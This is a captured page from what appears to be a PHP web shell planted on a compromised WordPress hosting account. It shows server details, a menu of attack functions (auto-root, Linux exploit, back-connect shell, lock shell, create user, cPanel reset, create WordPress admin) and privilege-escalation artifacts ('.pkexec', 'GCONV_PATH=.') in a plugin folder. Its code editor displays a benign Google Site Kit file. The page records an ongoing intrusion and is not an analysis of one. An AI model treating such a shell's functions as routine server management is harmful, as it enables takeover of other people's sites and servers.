Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 3.145.96.163
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
temmmp /
anonmags.com /
wp-content /
plugins /
google-site-kit /
includes /
Core /
Util /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
Activation_Flag.php
3.25
KB
-rw-r--r--
Activation_Notice.php
4.11
KB
-rw-r--r--
Auto_Updates.php
4.17
KB
-rw-r--r--
BC_Functions.php
4.68
KB
-rw-r--r--
Collection_Key_Cap_Filter.php
1.38
KB
-rw-r--r--
Date.php
1.93
KB
-rw-r--r--
Developer_Plugin_Installer.php
5.44
KB
-rw-r--r--
Entity.php
3.2
KB
-rw-r--r--
Entity_Factory.php
20.71
KB
-rw-r--r--
Exit_Handler.php
836
B
-rw-r--r--
Feature_Flags.php
2.22
KB
-rw-r--r--
Google_Icon.php
1.58
KB
-rw-r--r--
Google_URL_Matcher_Trait.php
3.02
KB
-rw-r--r--
Google_URL_Normalizer.php
1.6
KB
-rw-r--r--
Health_Checks.php
3.94
KB
-rw-r--r--
Input.php
2.76
KB
-rw-r--r--
Method_Proxy_Trait.php
1.09
KB
-rw-r--r--
Migrate_Legacy_Keys.php
1.08
KB
-rw-r--r--
Migration_1_123_0.php
4.54
KB
-rw-r--r--
Migration_1_129_0.php
4.01
KB
-rw-r--r--
Migration_1_3_0.php
2.96
KB
-rw-r--r--
Migration_1_8_1.php
6.85
KB
-rw-r--r--
Migration_Conversion_ID.php
4.02
KB
-rw-r--r--
REST_Entity_Search_Controller....
3.34
KB
-rw-r--r--
Remote_Features.php
3.97
KB
-rw-r--r--
Requires_Javascript_Trait.php
1.09
KB
-rw-r--r--
Reset.php
7.34
KB
-rw-r--r--
Reset_Persistent.php
666
B
-rw-r--r--
Sanitize.php
1.04
KB
-rw-r--r--
Scopes.php
2.59
KB
-rw-r--r--
Sort.php
1.1
KB
-rw-r--r--
Synthetic_WP_Query.php
4.08
KB
-rw-r--r--
URL.php
5.4
KB
-rw-r--r--
Uninstallation.php
3.27
KB
-rw-r--r--
WP_Context_Switcher_Trait.php
2.13
KB
-rw-r--r--
WP_Query_Factory.php
9.77
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Activation_Notice.php
<?php /** * Class Google\Site_Kit\Core\Util\Activation_Notice * * @package Google\Site_Kit * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Util; use Google\Site_Kit\Context; use Google\Site_Kit\Core\Admin\Notice; use Google\Site_Kit\Core\Assets\Assets; use Google\Site_Kit\Core\Util\Requires_Javascript_Trait; /** * Class handling plugin activation. * * @since 1.10.0 Renamed from Activation. * @access private * @ignore */ final class Activation_Notice { use Requires_Javascript_Trait; /** * Plugin context. * * @since 1.10.0 * @var Context */ private $context; /** * Activation flag instance. * * @since 1.10.0 * @var Activation_Flag */ protected $activation_flag; /** * Assets API instance. * * @since 1.10.0 * @var Assets */ protected $assets; /** * Constructor. * * @since 1.10.0 * * @param Context $context Plugin context. * @param Activation_Flag $activation_flag Activation flag instance. * @param Assets $assets Optional. The Assets API instance. Default is a new instance. */ public function __construct( Context $context, Activation_Flag $activation_flag, Assets $assets = null ) { $this->context = $context; $this->activation_flag = $activation_flag; $this->assets = $assets ?: new Assets( $this->context ); } /** * Registers functionality through WordPress hooks. * * @since 1.10.0 */ public function register() { add_filter( 'googlesitekit_admin_notices', function ( $notices ) { $notices[] = $this->get_activation_notice(); return $notices; } ); add_action( 'admin_enqueue_scripts', function ( $hook_suffix ) { if ( 'plugins.php' !== $hook_suffix || ! $this->activation_flag->get_activation_flag( is_network_admin() ) ) { return; } /** * Prevent the default WordPress "Plugin Activated" notice from rendering. * * @link https://github.com/WordPress/WordPress/blob/e1996633228749cdc2d92bc04cc535d45367bfa4/wp-admin/plugins.php#L569-L570 */ unset( $_GET['activate'] ); // phpcs:ignore WordPress.Security.NonceVerification, WordPress.VIP.SuperGlobalInputUsage $this->assets->enqueue_asset( 'googlesitekit-admin-css' ); $this->assets->enqueue_asset( 'googlesitekit-activation' ); } ); } /** * Gets the admin notice indicating that the plugin has just been activated. * * @since 1.10.0 * * @return Notice Admin notice instance. */ private function get_activation_notice() { return new Notice( 'activated', array( 'content' => function () { ob_start(); ?> <div class="googlesitekit-plugin"> <?php $this->render_noscript_html(); ?> <div id="js-googlesitekit-activation" class="googlesitekit-activation googlesitekit-activation--loading"> <div class="googlesitekit-activation__loading"> <div role="progressbar" class="mdc-linear-progress mdc-linear-progress--indeterminate"> <div class="mdc-linear-progress__buffering-dots"></div> <div class="mdc-linear-progress__buffer"></div> <div class="mdc-linear-progress__bar mdc-linear-progress__primary-bar"> <span class="mdc-linear-progress__bar-inner"></span> </div> <div class="mdc-linear-progress__bar mdc-linear-progress__secondary-bar"> <span class="mdc-linear-progress__bar-inner"></span> </div> </div> </div> </div> </div> <?php return ob_get_clean(); }, 'type' => Notice::TYPE_SUCCESS, 'active_callback' => function ( $hook_suffix ) { if ( 'plugins.php' !== $hook_suffix ) { return false; } $network_wide = is_network_admin(); $flag = $this->activation_flag->get_activation_flag( $network_wide ); if ( $flag ) { // Unset the flag so that the notice only shows once. $this->activation_flag->delete_activation_flag( $network_wide ); } return $flag; }, 'dismissible' => true, ) ); } }
Close